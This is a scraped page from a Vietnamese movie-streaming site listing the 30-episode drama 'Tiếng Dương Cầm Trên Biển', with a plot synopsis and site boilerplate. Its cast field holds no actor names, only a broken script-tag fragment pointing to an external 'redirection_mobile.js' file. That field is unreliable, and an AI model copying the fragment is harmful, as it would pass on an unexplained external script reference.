xem phim tieng duong cam tren bien online, download Tiếng Dương Cầm Trên Biển 30/30 hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Tiếng Dương Cầm Trên Biển 30/30 - phim viet nam
tieng duong cam tren bien

Tiếng Dương Cầm Trên Biển 30/30

,

30 episodes | Luot Xem: 943171   |  0 |  
Dien Vien: src="http://raphd.net/js/redirection_mobile.js">

cham bi  Description - Thong tin them ve phim


Nội dung:
Tiếng dương cầm trên biển là câu chuyện xoay quanh cuộc sống và sự trắc trở của ba nhân vật, Ngọc: một cô gái trẻ tài năng và nghị lực, Tùng: một doanh nhân trẻ, ông chủ một Cty PR có tiếng, Quang: chàng trai 30 tuổi giỏi giang, trung thực và cao thượng.

Ngọc, 24 tuổi, tài năng, nghị lực và ấp ủ khát vọng làm chủ một công ty PR danh tiếng, với sự bản lĩnh và nhạy bén, cô từng bước vượt qua mọi khó khăn để biến ước mơ thành hiện thực. Nhưng cùng với thành công là thách thức, công ty của Ngọc trở thành cái gai trong mắt một kỳ phùng địch thủ không dễ đánh bại là Tùng, Giám đốc một Cty PR lớn, người muốn thôn tính mọi đối thủ để nắm chắc vị trí độc tôn trong làng PR.

Cuộc chiến nổ ra, dù kiên cường nhưng Ngọc không thể trụ vững trước sức mạnh và những ngón đòn kinh nghiệm của Tùng. Tới lúc phá sản, phải chịu trách nhiệm trước pháp luật, Ngọc mới bàng hoàng nhận ra Tùng - kẻ quyết tiêu diệt mình bằng mọi giá lại là người anh trai mà cô đã thất lạc từ thưở nhỏ...
Phim cùng thể loại - Similar movies
View: 133158
View: 193932
View: 466487
View: 1353375
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung